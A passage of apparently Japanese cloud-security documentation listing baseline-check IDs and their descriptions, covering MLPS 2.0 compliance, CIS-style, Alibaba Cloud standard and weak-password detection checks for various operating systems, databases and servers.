MLPS 2.0 レベル 3：Red Hat Linux 6 コンプライアンスベースラインチェック

hc_redhat_djbh_l3

MLPS レベル 3 - Red Hat Linux 7 コンプライアンスベースラインチェック

hc_redis_djbh

MLPS 2.0 レベル 3：Redis コンプライアンスベースラインチェック

hc_suse 10_djbh_l3

MLPS 2.0 レベル 3：SUSE 10 コンプライアンスベースラインチェック

hc_suse 12_djbh_l3

MLPS 2.0 レベル 3：SUSE 12 コンプライアンスベースラインチェック

hc_suse_djbh_l3

MLPS 2.0 レベル 3：SUSE 11 コンプライアンスベースラインチェック

hc_ubuntu 14_djbh_l3

MLPS 2.0 レベル 3：Ubuntu 14 コンプライアンスベースラインチェック

hc_ubuntu_djbh_l3

MLPS 2.0 レベル 3：Ubuntu 16/18/20 コンプライアンスベースラインチェック

hc_was_djbh

MLPS 2.0 レベル 3：Websphere Application Server コンプライアンスベースラインチェック

hc_weblogic_djbh

MLPS レベル 3 - WebLogic コンプライアンスベースラインチェック

hc_win 2008_djbh_l3

MLPS 2.0 レベル 3：Windows 2008 R2 コンプライアンスベースラインチェック

hc_win 2012_djbh_l3

MLPS 2.0 レベル 3：Windows 2012 R2 コンプライアンスベースラインチェック

hc_win 2016_djbh_l3

MLPS 2.0 レベル 3：Windows 2016/2019 コンプライアンスベースラインチェック

hc_aliyun_linux_djbh_l2

MLPS 2.0 レベル 2：Alibaba Cloud Linux/Aliyun Linux 2 コンプライアンスベースラインチェック

hc_centos 6_djbh_l2

MLPS 2.0 レベル 2：CentOS Linux 6 コンプライアンスベースラインチェック

hc_centos 7_djbh_l2

MLPS 2.0 レベル 2：CentOS Linux 7 コンプライアンスベースラインチェック

hc_debian_djbh_l2

MLPS 2.0 レベル 2：Debian Linux 8 コンプライアンスベースラインチェック

hc_redhat 7_djbh_l2

MLPS 2.0 レベル 2：Red Hat Linux 7 コンプライアンスベースラインチェック

hc_ubuntu_djbh_l2

MLPS 2.0 レベル 2：Ubuntu 16/18 コンプライアンスベースラインチェック

hc_win 2008_djbh_l2

MLPS 2.0 レベル 2：Windows 2008 R2 コンプライアンスベースラインチェック

hc_win 2012_djbh_l2

MLPS 2.0 レベル 2：Windows 2012 R2 コンプライアンスベースラインチェック

hc_win 2016_djbh_l2

MLPS 2.0 レベル 2：Windows 2016/2019 コンプライアンスベースラインチェック

hc_aliyun_linux_cis

国際セキュリティベストプラクティス：Alibaba Cloud Linux/Aliyun Linux 2 セキュリティベースラインチェック

hc_centos 6_cis_rules

国際セキュリティベストプラクティス：CentOS Linux 6 セキュリティベースラインチェック

hc_centos 7_cis_rules

国際セキュリティベストプラクティス：CentOS Linux 7 セキュリティベースラインチェック

hc_centos 8_cis_rules

国際セキュリティベストプラクティス：CentOS Linux 8 セキュリティベースラインチェック

hc_debian 8_cis_rules

国際セキュリティベストプラクティス：Debian Linux 8 セキュリティベースラインチェック

hc_ubuntu 14_cis_rules

国際セキュリティベストプラクティス：Ubuntu 14 セキュリティベースラインチェック

hc_ubuntu 16_cis_rules

国際セキュリティベストプラクティス：Ubuntu 16/18/20 セキュリティベースラインチェック

hc_win 2008_cis_rules

国際セキュリティベストプラクティス：Windows Server 2008 R2 セキュリティベースラインチェック

hc_win 2012_cis_rules

国際セキュリティベストプラクティス：Windows Server 2012 R2 セキュリティベースラインチェック

hc_win 2016_cis_rules

国際セキュリティベストプラクティス：Windows Server 2016/2019 R2 セキュリティベースラインチェック

hc_kylin_djbh_l3

MLPS 2.0 レベル 3：Kylin コンプライアンスベースラインチェック

hc_uos_djbh_l3

MLPS 2.0 レベル 3：UOS コンプライアンスベースラインチェック

hc_best_security

hc_aliyun_linux

Alibaba Cloud 標準：Alibaba Cloud Linux/Aliyun Linux 2 セキュリティベースラインチェック

hc_centos 6

Alibaba Cloud 標準：CentOS Linux 6 セキュリティベースラインチェック

hc_centos 7

Alibaba Cloud 標準：CentOS Linux 7/8 セキュリティベースラインチェック

hc_debian

Alibaba Cloud 標準：Debian Linux 8/9/10 セキュリティベースラインチェック

hc_redhat 6

Alibaba Cloud 標準：Red Hat Linux 6 セキュリティベースラインチェック

hc_redhat 7

Alibaba Cloud 標準：Red Hat Linux 7/8 セキュリティベースラインチェック

hc_ubuntu

Alibaba Cloud 標準：Ubuntu セキュリティベースラインチェック

hc_windows_2008

Alibaba Cloud 標準：Windows 2008 R2 セキュリティベースラインチェック

hc_windows_2012

Alibaba Cloud 標準：Windows 2012 R2 セキュリティベースラインチェック

hc_windows_2016

Alibaba Cloud 標準：Windows 2016/2019 セキュリティベースラインチェック

hc_db_mssql

Alibaba Cloud 標準：SQL Server セキュリティベースラインチェック

hc_memcached_ali

Alibaba Cloud 標準：Memcached セキュリティベースラインチェック

hc_mongodb

Alibaba Cloud 標準：MongoDB 3.x セキュリティベースラインチェック

hc_mysql_ali

Alibaba Cloud 標準：MySQL セキュリティベースラインチェック

hc_oracle

Alibaba Cloud 標準：Oracle 11g セキュリティベースラインチェック

hc_pgsql_ali

Alibaba Cloud 標準：PostgreSQL セキュリティベースラインチェック

hc_redis_ali

Alibaba Cloud 標準：Redis セキュリティベースラインチェック

hc_apache

Alibaba Cloud 標準：Apache セキュリティベースラインチェック

hc_iis_8

Alibaba Cloud 標準：IIS 8 セキュリティベースラインチェック

hc_nginx_linux

Alibaba Cloud 標準：Nginx セキュリティベースラインチェック

hc_suse 15

Alibaba Cloud 標準：SUSE Linux 15 セキュリティベースラインチェック

tomcat 7

Alibaba Cloud 標準：Apache Tomcat セキュリティベースラインチェック

weak_password

hc_mongodb_pwd

弱いパスワード：MongoDB ログインの弱いパスワード検出 (バージョン 2.x をサポート)

hc_weakpwd_ftp_linux

弱いパスワード：FTP ログインの弱いパスワードチェック

hc_weakpwd_linux_sys

弱いパスワード：Linux システムログインの弱いパスワードチェック

hc_weakpwd_mongodb 3

弱いパスワード：MongoDB ログインの弱いパスワード検出

hc_weakpwd_mssql

弱いパスワード：SQL Server データベースログインの弱いパスワードチェック

hc_weakpwd_mysql_linux

弱いパスワード：MySQL データベースログインの弱いパスワードチェック

hc_weakpwd_mysql_win

弱いパスワード：MySQL データベースログインの弱いパスワードチェック (Windows)

hc_weakpwd_openldap

弱いパスワード：OpenLDAP ログインの弱いパスワードチェック

hc_weakpwd_oracle

弱いパスワード：Oracle ログインの弱いパスワード検出

hc_weakpwd_pgsql

弱いパスワード：PostgreSQL データベースログインの弱いパスワードチェック

hc_weakpwd_pptp

弱いパスワード：pptpd サービスログインの弱いパスワードチェック

hc_weakpwd_redis_linux

弱いパスワード：Redis データベースログインの弱いパスワードチェック

hc_weakpwd_rsync

弱いパスワード：rsync サービスログインの弱いパスワードチェック

hc_weakpwd_svn

弱いパスワード：SVN サービスログインの弱いパスワードチェック

hc_weakpwd_tomcat_linux

弱いパスワード：Apache Tomcat コンソールの弱いパスワードチェック

hc_weakpwd_vnc

弱いパスワード：VNC Server の弱いパスワードチェック

hc_weakpwd_weblogic

弱いパスワード：WebLogic 12c ログインの弱いパスワード検出

hc_weakpwd_win_sys

弱いパスワード：Windows システムログインの弱いパスワードチェック